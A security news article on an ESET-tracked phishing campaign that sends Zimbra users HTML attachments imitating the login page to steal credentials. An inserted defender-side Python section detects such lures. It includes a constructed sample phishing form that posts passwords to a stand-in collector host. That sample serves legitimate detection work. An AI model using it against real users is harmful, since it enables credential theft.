Phishing Attack Targets Hundreds of Zimbra Customers in 4 Continents

Published: 23/11/2024   Category: security



A good chunk of the entire user base of a particular email service is being targeted for sensitive credentials.



Despite its simplicity, a phishing campaign targeting customers of the Zimbra Collaboration software suite has spread to hundreds of organizations in over a dozen countries.
Zimbra is a collaborative software suite, which includes an email server and Web client. It is a niche alternative to traditional enterprise email solutions with a small fraction of the market, according to user figures tracked by Enlyft and 6sense.
Zimbra has been beset by security incidents all year, including a remote code execution bug, a cross-site scripting zero-day, and an infostealing campaign by the nation of North Korea.
According to researchers at ESET, since April 2023, an unidentified threat actor has been using scattershot phishing emails to cull credentials for privileged Zimbra accounts. The primary targets have been small-to-midsized businesses (the open-core software's primary customer base), though some government organizations were swept up in the campaign, as well.
"Hundreds of different organizations were targeted by this campaign," claims Anton Cherepanov, senior malware researcher for ESET. However, the extent of damage is hard to say, because most of the attacks were rooted out before they took hold.
Each attack starts the same — a general phishing email, purporting to come from Zimbra itself, relaying some kind of urgent message about, say, a server update, or account deactivation. For example, the following note titled "Important information from Zimbra Security Service":
"Starting today 3/7/2023 Your Zimbra web client login page will change. We are preparing for an email update. However, to avoid deactivation and loss of access to your email account, preview the download of the attachment."
The email is signed "Zimbra Boss — Administration."
Attached is an HTML file, directing the user to a generic Zimbra login page with some identifying elements customized for the particular target organization. The page opens in the user's browser, despite being a local file path, and prefills the username field, in order to give the impression of a legitimate Zimbra login page.
Of course, any user who types in their password into the fake login page will be sending the sensitive information straight to the attackers.
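As an added, defender-side illustration (not code from the original article or from ESET), the following Python heuristics flag an HTML attachment that matches the lure described above: a password form that posts to a host other than the organisation's own Zimbra server, and a prefilled username field. `LEGIT_ZIMBRA_HOST`, the sample page and all domain names in it are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical value: the organisation's legitimate Zimbra web client host.
LEGIT_ZIMBRA_HOST = "mail.example.org"


class _FormScanner(HTMLParser):
    """Collect every <form> together with the <input> fields it contains."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def assess_html_attachment(html, legit_host=LEGIT_ZIMBRA_HOST):
    """Return the reasons an HTML attachment looks like a credential-harvesting page.

    Heuristics follow the lure above: a login form shipped as a local HTML file,
    a password form posting anywhere but the real Zimbra host, a prefilled username."""
    scanner = _FormScanner()
    scanner.feed(html)
    reasons = []
    for form in scanner.forms:
        inputs = form["inputs"]
        if not any(i.get("type", "text").lower() == "password" for i in inputs):
            continue  # no password field: not a credential form
        reasons.append("credential form delivered as an HTML attachment")
        host = urlparse(form["action"]).hostname  # None for relative/empty actions
        if host != legit_host:
            reasons.append(f"password form posts to {host or 'a non-absolute action'}")
        for i in inputs:
            if i.get("type", "text").lower() in ("text", "email") and i.get("value"):
                reasons.append(f"username field prefilled with {i['value']!r}")
    return reasons


# Constructed sample resembling the described lure; not a real campaign artefact.
SAMPLE_LURE = """<html><body><h1>Zimbra Web Client Sign In</h1>
<form method="post" action="https://collector.example.net/login">
  <input type="text" name="username" value="jan.kowalski@example.org">
  <input type="password" name="password"> <input type="submit" value="Sign In">
</form></body></html>"""
```

Run `assess_html_attachment(SAMPLE_LURE)` to see the three findings; a mail gateway hook would call it on every `text/html` attachment and quarantine on any non-empty result.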
"The worst-case outcome is that attackers could gain Zimbra Administrator's privileges, and then potentially root privileges on the server itself. But it depends on many factors such as potential password re-use, configuration used, etc.," Cherepanov says.
The country most affected by this campaign is Poland, followed by Ecuador and Italy, with attacks also reaching as far and wide as Mexico, Kazakhstan, and the Netherlands. Targets share nothing in common aside from their use of Zimbra.
To avoid compromise, Cherepanov recommends standard security hygiene: using strong passwords, multi-factor authentication, and updating to the most recent version of Zimbra.
